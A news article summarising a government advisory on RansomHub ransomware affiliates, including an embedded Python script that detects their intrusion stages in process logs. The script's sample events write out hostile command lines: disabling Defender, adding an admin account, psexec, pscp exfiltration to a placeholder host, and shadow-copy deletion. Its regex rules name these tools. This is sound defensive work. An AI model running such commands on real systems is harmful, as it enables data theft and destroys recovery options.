
RansomHub ransomware group strikes 210 victims in vital industries

Affiliates of the RansomHub ransomware group have encrypted and exfiltrated data from at least 210 victims since the operation surfaced in February 2024, according to a joint advisory from U.S. government agencies including the FBI and CISA.

The victims come from various industries, such as water and wastewater, IT, government, healthcare, emergency services, finance, manufacturing, transportation, and communication.

RansomHub, also known as Cyclops and Knight, operates under a ransomware-as-a-service (RaaS) model and has attracted high-profile affiliates from other well-known operations such as LockBit and ALPHV (BlackCat), according to the advisory.

The ransomware’s activity has been growing, accounting for 2% of all attacks in Q1 2024, 5.1% in Q2, and 14.2% in Q3, according to a recent analysis by ZeroFox.

Approximately one-third of RansomHub's victims have been European organizations, a higher share than the average observed across other ransomware groups in the same period.

The group employs the double extortion model to steal data and encrypt systems, pressuring victims to pay a ransom. Those who refuse to comply have their information exposed on a data leak site.

RansomHub affiliates gain initial access by phishing, password spraying, and exploiting known, already-patched vulnerabilities in internet-facing software, including Apache ActiveMQ (CVE-2023-46604), Atlassian Confluence (CVE-2023-22515), Citrix ADC (CVE-2023-3519), F5 BIG-IP (CVE-2023-46747), Fortinet FortiOS (CVE-2023-27997), and Fortinet FortiClientEMS (CVE-2023-48788). Every one of these had a vendor fix available before the advisory was published, so exposure comes down to patch latency on edge devices.

Once inside, affiliates use reconnaissance tools such as AngryIPScanner and Nmap to map the network, and disable or uninstall antivirus and endpoint-detection software to avoid detection.

They then create new user accounts, escalate privileges, and move laterally using Remote Desktop Protocol, PsExec, and similar remote-execution methods, while maintaining command and control through remote-access and post-exploitation tooling.

Before encryption, the affiliates exfiltrate data using transfer tools such as PuTTY and WinSCP, among others, so that by the time files are encrypted the data needed for extortion has already left the network.
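The intrusion chain described above (scanning, antivirus tampering, account creation, PsExec/RDP lateral movement, exfiltration with PuTTY- or WinSCP-style tools, and shadow-copy deletion before encryption) is exactly the kind of sequence a detection engineer wants to correlate rather than alert on piecemeal, because any single step (a `net user /add`, one WinSCP launch) is common admin activity. The following is an added example, not code from the advisory, the article, or the vendors named: it replays the playbook as regex stage rules over process-creation events and flags only hosts where several stages cluster within a time window. The event format, the exact command-line patterns, and the sample events are all constructed for this example.

```python
"""Stage correlation for the RansomHub affiliate playbook.

Added example; the tool names follow the advisory's TTP description, while
the command-line syntax, event format and sample telemetry are assumptions
constructed for illustration.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# One regex per playbook stage, applied to the process command line.
STAGE_PATTERNS = {
    "recon": re.compile(r"\b(nmap|ipscan|angryip)\b", re.I),
    "defense_evasion": re.compile(
        r"(Set-MpPreference\s+-Disable|taskkill.*\bMsMpEng\b)", re.I),
    "account_creation": re.compile(
        r"\bnet(1)?(\.exe)?\s+(user|localgroup)\b.*\s/add\b", re.I),
    "lateral_movement": re.compile(r"(psexec|psexesvc|mstsc)", re.I),
    "exfiltration": re.compile(r"\b(pscp|winscp|plink|rclone)(\.exe)?\b", re.I),
    "impact_prep": re.compile(
        r"vssadmin(\.exe)?\s+delete\s+shadows|wbadmin\s+delete\s+catalog", re.I),
}

# Constructed sample process-creation events (not real telemetry).
# WS-FIN-07 runs the full chain in under five hours; SRV-FILE-01 shows two
# isolated, plausibly legitimate admin actions a day apart.
SAMPLE_EVENTS = [
    {"ts": "2024-08-12T01:02:00", "host": "WS-FIN-07", "user": "CORP\\jdoe",
     "cmdline": "nmap.exe -sS -p 445,3389 10.20.0.0/24"},
    {"ts": "2024-08-12T01:15:00", "host": "WS-FIN-07", "user": "CORP\\jdoe",
     "cmdline": "powershell.exe -c Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"ts": "2024-08-12T01:20:00", "host": "WS-FIN-07", "user": "CORP\\jdoe",
     "cmdline": "net user svc_backup P@ssw0rd! /add"},
    {"ts": "2024-08-12T01:21:00", "host": "WS-FIN-07", "user": "CORP\\jdoe",
     "cmdline": "net localgroup administrators svc_backup /add"},
    {"ts": "2024-08-12T02:40:00", "host": "WS-FIN-07", "user": "CORP\\svc_backup",
     "cmdline": "psexec.exe \\\\10.20.0.15 -s -d cmd.exe /c whoami"},
    {"ts": "2024-08-12T03:10:00", "host": "WS-FIN-07", "user": "CORP\\svc_backup",
     "cmdline": "pscp.exe -r D:\\Finance\\ exfil@203.0.113.9:/data/"},
    {"ts": "2024-08-12T05:55:00", "host": "WS-FIN-07", "user": "CORP\\svc_backup",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"ts": "2024-08-12T09:00:00", "host": "SRV-FILE-01", "user": "CORP\\itadmin",
     "cmdline": "winscp.exe /console /script=nightly_sync.txt"},
    {"ts": "2024-08-13T10:00:00", "host": "SRV-FILE-01", "user": "CORP\\itadmin",
     "cmdline": "net user contractor1 Temp#2024 /add"},
]


def classify(cmdline):
    """Return the set of playbook stages a command line matches (may be empty)."""
    return {stage for stage, pat in STAGE_PATTERNS.items() if pat.search(cmdline)}


def correlate(events, window=timedelta(hours=6), min_stages=3):
    """Flag hosts where at least `min_stages` distinct stages occur within `window`.

    Returns {host: sorted list of stage names} for flagged hosts only, so a lone
    scanner run or a single account creation never produces a finding.
    """
    per_host = defaultdict(list)
    for ev in events:
        ts = datetime.fromisoformat(ev["ts"])
        for stage in classify(ev["cmdline"]):
            per_host[ev["host"]].append((ts, stage))

    findings = {}
    for host, hits in per_host.items():
        hits.sort()
        best = set()
        # Slide a window starting at each hit; keep the richest stage set seen.
        for i, (t0, _) in enumerate(hits):
            in_window = {s for t, s in hits[i:] if t - t0 <= window}
            if len(in_window) > len(best):
                best = in_window
        if len(best) >= min_stages:
            findings[host] = sorted(best)
    return findings


if __name__ == "__main__":
    for host, stages in correlate(SAMPLE_EVENTS).items():
        print(f"{host}: {len(stages)} playbook stages within 6h -> {', '.join(stages)}")
```

The threshold and window are deliberately conservative: requiring three distinct stages within six hours suppresses the two isolated SRV-FILE-01 events while still catching WS-FIN-07 well before the `vssadmin` step, which is the last point at which recovery from shadow copies is still possible. In production the same stage rules would be fed from Sysmon Event ID 1 or EDR process telemetry rather than an inline list.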

In a separate development, Palo Alto Networks Unit 42 detailed the tactics of ShinyHunters (tracked by Unit 42 as Bling Libra), a data-theft group first identified in 2020 that has shifted from selling stolen data to extorting the victims it steals it from.

Ransomware attacks have evolved beyond encryption and data leakage into triple and quadruple extortion schemes, which add further pressure such as DDoS attacks against the victim or direct contact with its customers and partners.

New ransomware variants such as Allarich, Cronus, CyberVolk, Datablack, DeathGrip, Hawk Eye, and Insom have continued to emerge, and the U.S. government has separately warned that Iranian nation-state actors are collaborating with ransomware affiliates.
